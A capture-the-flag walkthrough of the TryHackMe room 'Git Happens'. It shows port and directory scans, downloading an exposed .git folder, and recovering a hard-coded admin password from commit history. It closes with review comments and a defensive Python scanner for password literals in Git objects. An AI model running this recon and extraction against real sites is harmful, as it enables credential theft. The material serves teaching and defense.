Overview
This is a walkthrough of the TryHackMe room "Git Happens".
Task 1
Q1. Find the Super Secret Password
Run a port scan.
$ nmap -Pn -T4 -sVC -A -p- 10.10.100.139 -oN nmap_result
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
|_http-server-header: nginx/1.14.0 (Ubuntu)
| http-git:
| 10.10.100.139:80/.git/
| Git repository found!
|_ Repository description: Unnamed repository; edit this file 'description' to name the...
Run a directory scan.
$ dirsearch -u http://10.10.100.139
[05:45:30] 200 - 1KB - /.git/
[05:45:30] 200 - 179B - /.git/branches/
[05:45:30] 200 - 110B - /.git/config
[05:45:30] 200 - 73B - /.git/description
[05:45:30] 200 - 23B - /.git/HEAD
[05:45:30] 200 - 1KB - /.git/hooks/
[05:45:30] 200 - 645B - /.git/index
[05:45:30] 200 - 283B - /.git/info/
[05:45:30] 200 - 240B - /.git/info/exclude
[05:45:30] 200 - 390B - /.git/logs/
[05:45:30] 301 - 194B - /.git/logs/refs -> http://10.10.100.139/.git/logs/refs/
[05:45:30] 200 - 216B - /.git/logs/HEAD
[05:45:30] 301 - 194B - /.git/logs/refs/heads -> http://10.10.100.139/.git/logs/refs/heads/
[05:45:30] 200 - 216B - /.git/logs/refs/heads/master
[05:45:30] 301 - 194B - /.git/logs/refs/remotes -> http://10.10.100.139/.git/logs/refs/remotes/
[05:45:30] 200 - 4KB - /.git/objects/
[05:45:31] 200 - 102B - /.git/packed-refs
[05:45:31] 200 - 505B - /.git/refs/
[05:45:31] 301 - 194B - /.git/refs/heads -> http://10.10.100.139/.git/refs/heads/
[05:45:31] 301 - 194B - /.git/refs/remotes -> http://10.10.100.139/.git/refs/remotes/
[05:45:31] 200 - 41B - /.git/refs/heads/master
[05:45:31] 301 - 194B - /.git/refs/tags -> http://10.10.100.139/.git/refs/tags/
[05:45:31] 200 - 792B - /.gitlab-ci.yml
[05:46:18] 301 - 194B - /css -> http://10.10.100.139/css/
[05:46:19] 200 - 4KB - /dashboard.html
[05:47:01] 200 - 54B - /README.md
Git-related files are exposed under the /.git path.
The root directory has a login form.
Download everything under /.git.
$ wget -r http://10.10.100.139/.git/
The commit history contains several commits.
$ git log
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)
Author: Adam Bertrand <hydragyrum@gmail.com>
Date: Thu Jul 23 22:22:16 2020 +0000
Update .gitlab-ci.yml
commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Fri Jul 24 00:21:25 2020 +0200
add gitlab-ci config to build docker file.
commit 2eb93ac3534155069a8ef59cb25b9c1971d5d199
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Fri Jul 24 00:08:38 2020 +0200
setup dockerfile and setup defaults.
commit d6df4000639981d032f628af2b4d03b8eff31213
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:42:30 2020 +0200
Make sure the css is standard-ish!
commit d954a99b96ff11c37a558a5d93ce52d0f3702a7d
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:41:12 2020 +0200
re-obfuscating the code to be really secure!
commit bc8054d9d95854d278359a432b6d97c27e24061d
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:37:32 2020 +0200
Security says obfuscation isn't enough.
They want me to use something called 'SHA-512'
commit e56eaa8e29b589976f33d76bc58a0c4dfb9315b1
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:25:52 2020 +0200
Obfuscated the source code.
Hopefully security will be happy!
commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <hydragyrum@gmail.com>
Date: Thu Jul 23 23:17:43 2020 +0200
Made the login page, boss!
commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand <hydragyrum@gmail.com>
Date: Mon Jul 20 20:46:28 2020 +0000
Initial commit
Going through the commits in order, the source code yields the credentials.
$ git show 395e087334d613d5e423cdf8f7be27196a360459
(omitted)
+ <script>
+ function login() {
+ let form = document.getElementById("login-form");
+ console.log(form.elements);
+ let username = form.elements["username"].value;
+ let password = form.elements["password"].value;
+ if (
+ username === "admin" &&
+ password === "Th1s_1s_4_L0ng_4nd_S3cur3_P4ssw0rd!"
+ ) {
+ document.cookie = "login=1";
+ window.location.href = "/dashboard.html";
+ } else {
+ document.getElementById("error").innerHTML =
+ "INVALID USERNAME OR PASSWORD!";
+ }
+ }
+ </script>
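Review bot: the `username === "admin" && password === ...` comparison in login() ships the plaintext credential to every browser and commits it to history, so the check has to move to the server and compare against a salted hash there, and this password needs rotating because it stays readable in this commit whatever later commits do. The `document.cookie = "login=1"` line is set by the client itself, so the server cannot treat it as proof of authentication; issue a server-side session after a successful login instead. The `console.log(form.elements)` call looks like leftover debugging and should be dropped.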
A. Th1s_1s_4_L0ng_4nd_S3cur3_P4ssw0rd!
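The password was recoverable because the blob from the first login-page commit stayed in the object store after later commits changed the code. As an added example (not part of the original walkthrough), this Python code checks the loose objects of a repository you own for hard-coded password literals before it is deployed. The function names, the regex and the sample blobs are constructed for illustration, and packfiles are not covered.

```python
import hashlib
import re
import tempfile
import zlib
from pathlib import Path

# Heuristic (assumption): a quoted literal compared or assigned to a password-like name.
SECRET_RE = re.compile(
    rb'(?i)(passw(or)?d|secret|token)\w*\s*(===?|[:=])\s*["\']([^"\']{6,})["\']')

def write_loose_object(git_dir, kind, body):
    """Store body the way Git stores a loose object: zlib("<kind> <len>\\0" + body)."""
    raw = kind.encode() + b" " + str(len(body)).encode() + b"\0" + body
    oid = hashlib.sha1(raw).hexdigest()
    path = Path(git_dir, "objects", oid[:2], oid[2:])
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_bytes(zlib.compress(raw))
    return oid

def scan_loose_blobs(git_dir):
    """Return sorted (object id, literal) pairs for loose blobs holding a secret."""
    findings = []
    for path in Path(git_dir, "objects").glob("[0-9a-f][0-9a-f]/*"):
        raw = zlib.decompress(path.read_bytes())
        header, _, body = raw.partition(b"\0")
        if not header.startswith(b"blob "):
            continue  # trees and commits carry no file content
        for m in SECRET_RE.finditer(body):
            oid = path.parent.name + path.name
            findings.append((oid, m.group(4).decode(errors="replace")))
    return sorted(findings)

def demo():
    # Constructed sample: the old blob has a literal, the new blob replaced it.
    with tempfile.TemporaryDirectory() as git_dir:
        old = write_loose_object(
            git_dir, "blob", b'if (password === "CONSTRUCTED_Example_Pw1") { ok(); }\n')
        new = write_loose_object(
            git_dir, "blob", b'if (hash(password) === storedHash) { ok(); }\n')
        return old, new, scan_loose_blobs(git_dir)

if __name__ == "__main__":
    for oid, literal in demo()[2]:
        print(f"blob {oid}: hard-coded literal {literal!r}")
```

A hit on an old blob means the literal has to be rotated, since changing the file in a later commit does not remove the earlier object.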